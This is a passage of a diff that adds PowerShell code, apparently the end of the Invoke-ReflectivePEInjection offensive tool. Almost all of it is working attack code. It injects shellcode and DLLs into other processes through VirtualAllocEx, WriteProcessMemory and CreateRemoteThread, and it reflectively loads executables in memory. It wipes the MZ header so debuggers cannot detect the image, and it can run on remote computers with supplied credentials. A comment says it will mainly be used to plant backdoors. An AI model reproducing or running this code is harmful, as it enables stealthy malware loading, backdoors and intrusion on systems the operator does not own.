+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
2604
+
2605
+ $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2606
+ if ($RSCAddr -eq [IntPtr]::Zero)
2607
+ {
2608
+ Throw "Unable to allocate memory in the remote process for shellcode"
2609
+ }
2610
+
2611
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
2612
+ if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
2613
+ {
2614
+ Throw "Unable to write shellcode to remote process memory."
2615
+ }
2616
+
2617
+ $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
2618
+ $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
2619
+ if ($Result -ne 0)
2620
+ {
2621
+ Throw "Call to CreateRemoteThread to call GetProcAddress failed."
2622
+ }
2623
+
2624
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
2625
+ }
2626
+ }
2627
+ elseif ($PEInfo.FileType -ieq "EXE")
2628
+ {
2629
+ #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process
2630
+ [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
2631
+ [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
2632
+ $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
2633
+
2634
+ #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread
2635
+ # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
2636
+ [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2637
+ Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
2638
+
2639
+ $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
2640
+
2641
+ while($true)
2642
+ {
2643
+ [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
2644
+ if ($ThreadDone -eq 1)
2645
+ {
2646
+ Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
2647
+ Write-Verbose "EXE thread has completed."
2648
+ break
2649
+ }
2650
+ else
2651
+ {
2652
+ Start-Sleep -Seconds 1
2653
+ }
2654
+ }
2655
+ }
2656
+
2657
+ return @($PEInfo.PEHandle, $EffectivePEHandle)
2658
+ }
2659
+
2660
+
2661
+ Function Invoke-MemoryFreeLibrary
2662
+ {
2663
+ Param(
2664
+ [Parameter(Position=0, Mandatory=$true)]
2665
+ [IntPtr]
2666
+ $PEHandle
2667
+ )
2668
+
2669
+ #Get Win32 constants and functions
2670
+ $Win32Constants = Get-Win32Constants
2671
+ $Win32Functions = Get-Win32Functions
2672
+ $Win32Types = Get-Win32Types
2673
+
2674
+ $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2675
+
2676
+ #Call FreeLibrary for all the imports of the DLL
2677
+ if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
2678
+ {
2679
+ [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
2680
+
2681
+ while ($true)
2682
+ {
2683
+ $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
2684
+
2685
+ #If the structure is null, it signals that this is the end of the array
2686
+ if ($ImportDescriptor.Characteristics -eq 0 `
2687
+ -and $ImportDescriptor.FirstThunk -eq 0 `
2688
+ -and $ImportDescriptor.ForwarderChain -eq 0 `
2689
+ -and $ImportDescriptor.Name -eq 0 `
2690
+ -and $ImportDescriptor.TimeDateStamp -eq 0)
2691
+ {
2692
+ Write-Verbose "Done unloading the libraries needed by the PE"
2693
+ break
2694
+ }
2695
+
2696
+ $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
2697
+ $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
2698
+
2699
+ if ($ImportDllHandle -eq $null)
2700
+ {
2701
+ Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
2702
+ }
2703
+
2704
+ $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
2705
+ if ($Success -eq $false)
2706
+ {
2707
+ Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
2708
+ }
2709
+
2710
+ $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
2711
+ }
2712
+ }
2713
+
2714
+ #Call DllMain with process detach
2715
+ Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
2716
+ $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2717
+ $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
2718
+ $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
2719
+
2720
+ $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
2721
+
2722
+
2723
+ $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
2724
+ if ($Success -eq $false)
2725
+ {
2726
+ Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
2727
+ }
2728
+ }
2729
+
2730
+
2731
+ Function Main
2732
+ {
2733
+ $Win32Functions = Get-Win32Functions
2734
+ $Win32Types = Get-Win32Types
2735
+ $Win32Constants = Get-Win32Constants
2736
+
2737
+ $RemoteProcHandle = [IntPtr]::Zero
2738
+
2739
+ #If a remote process to inject in to is specified, get a handle to it
2740
+ if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
2741
+ {
2742
+ Throw "Can't supply a ProcId and ProcName, choose one or the other"
2743
+ }
2744
+ elseif ($ProcName -ne $null -and $ProcName -ne "")
2745
+ {
2746
+ $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
2747
+ if ($Processes.Count -eq 0)
2748
+ {
2749
+ Throw "Can't find process $ProcName"
2750
+ }
2751
+ elseif ($Processes.Count -gt 1)
2752
+ {
2753
+ $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
2754
+ Write-Output $ProcInfo
2755
+ Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
2756
+ }
2757
+ else
2758
+ {
2759
+ $ProcId = $Processes[0].ID
2760
+ }
2761
+ }
2762
+
2763
+ #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.
2764
+ #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege
2765
+ # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)
2766
+ # {
2767
+ # Write-Verbose "Getting SeDebugPrivilege"
2768
+ # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
2769
+ # }
2770
+
2771
+ if (($ProcId -ne $null) -and ($ProcId -ne 0))
2772
+ {
2773
+ $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
2774
+ if ($RemoteProcHandle -eq [IntPtr]::Zero)
2775
+ {
2776
+ Throw "Couldn't obtain the handle for process ID: $ProcId"
2777
+ }
2778
+
2779
+ Write-Verbose "Got the handle for the remote process to inject in to"
2780
+ }
2781
+
2782
+
2783
+ #Load the PE reflectively
2784
+ Write-Verbose "Calling Invoke-MemoryLoadLibrary"
2785
+ $PEHandle = [IntPtr]::Zero
2786
+ if ($RemoteProcHandle -eq [IntPtr]::Zero)
2787
+ {
2788
+ $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
2789
+ }
2790
+ else
2791
+ {
2792
+ $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
2793
+ }
2794
+ if ($PELoadedInfo -eq [IntPtr]::Zero)
2795
+ {
2796
+ Throw "Unable to load PE, handle returned is NULL"
2797
+ }
2798
+
2799
+ $PEHandle = $PELoadedInfo[0]
2800
+ $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process
2801
+
2802
+
2803
+ #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.
2804
+ $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2805
+ if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
2806
+ {
2807
+ #########################################
2808
+ ### YOUR CODE GOES HERE
2809
+ #########################################
2810
+ switch ($FuncReturnType)
2811
+ {
2812
+ 'WString' {
2813
+ Write-Verbose "Calling function with WString return type"
2814
+ [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
2815
+ if ($WStringFuncAddr -eq [IntPtr]::Zero)
2816
+ {
2817
+ Throw "Couldn't find function address."
2818
+ }
2819
+ $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
2820
+ $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
2821
+ [IntPtr]$OutputPtr = $WStringFunc.Invoke()
2822
+ $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
2823
+ Write-Output $Output
2824
+ }
2825
+
2826
+ 'String' {
2827
+ Write-Verbose "Calling function with String return type"
2828
+ [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
2829
+ if ($StringFuncAddr -eq [IntPtr]::Zero)
2830
+ {
2831
+ Throw "Couldn't find function address."
2832
+ }
2833
+ $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
2834
+ $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
2835
+ [IntPtr]$OutputPtr = $StringFunc.Invoke()
2836
+ $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
2837
+ Write-Output $Output
2838
+ }
2839
+
2840
+ 'Void' {
2841
+ Write-Verbose "Calling function with Void return type"
2842
+ [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
2843
+ if ($VoidFuncAddr -eq [IntPtr]::Zero)
2844
+ {
2845
+ Throw "Couldn't find function address."
2846
+ }
2847
+ $VoidFuncDelegate = Get-DelegateType @() ([Void])
2848
+ $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
2849
+ $VoidFunc.Invoke() | Out-Null
2850
+ }
2851
+ }
2852
+ #########################################
2853
+ ### END OF YOUR CODE
2854
+ #########################################
2855
+ }
2856
+ #For remote DLL injection, call a void function which takes no parameters
2857
+ elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
2858
+ {
2859
+ $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
2860
+ if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
2861
+ {
2862
+ Throw "VoidFunc couldn't be found in the DLL"
2863
+ }
2864
+
2865
+ $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
2866
+ $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
2867
+
2868
+ #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors
2869
+ $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
2870
+ }
2871
+
2872
+ #Don't free a library if it is injected in a remote process or if it is an EXE.
2873
+ #Note that all DLL's loaded by the EXE will remain loaded in memory.
2874
+ if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
2875
+ {
2876
+ Invoke-MemoryFreeLibrary -PEHandle $PEHandle
2877
+ }
2878
+ else
2879
+ {
2880
+ #Delete the PE file from memory.
2881
+ $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
2882
+ if ($Success -eq $false)
2883
+ {
2884
+ Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
2885
+ }
2886
+ }
2887
+
2888
+ Write-Verbose "Done!"
2889
+ }
2890
+
2891
+ Main
2892
+ }
2893
+
2894
+ #Main function to either run the script locally or remotely
2895
+ Function Main
2896
+ {
2897
+ if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
2898
+ {
2899
+ $DebugPreference = "Continue"
2900
+ }
2901
+
2902
+ Write-Verbose "PowerShell ProcessID: $PID"
2903
+
2904
+ if ($PsCmdlet.ParameterSetName -ieq "LocalFile")
2905
+ {
2906
+ Get-ChildItem $PEPath -ErrorAction Stop | Out-Null
2907
+ [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath))
2908
+ }
2909
+
2910
+ #Verify the image is a valid PE file
2911
+ $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
2912
+
2913
+ if ($e_magic -ne 'MZ')
2914
+ {
2915
+ throw 'PE is not a valid PE file.'
2916
+ }
2917
+
2918
+ # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg
2919
+ # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.
2920
+ $PEBytes[0] = 0
2921
+ $PEBytes[1] = 0
2922
+
2923
+ #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)
2924
+ if ($ExeArgs -ne $null -and $ExeArgs -ne '')
2925
+ {
2926
+ $ExeArgs = "ReflectiveExe $ExeArgs"
2927
+ }
2928
+ else
2929
+ {
2930
+ $ExeArgs = "ReflectiveExe"
2931
+ }
2932
+
2933
+ if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
2934
+ {
2935
+ Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
2936
+ }
2937
+ else
2938
+ {
2939
+ Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName -Credential $Credential
2940
+ }
2941
+ }
2942
+
2943
+ Main
2944
+ }
2945
+ Invoke-ReflectivePEInjection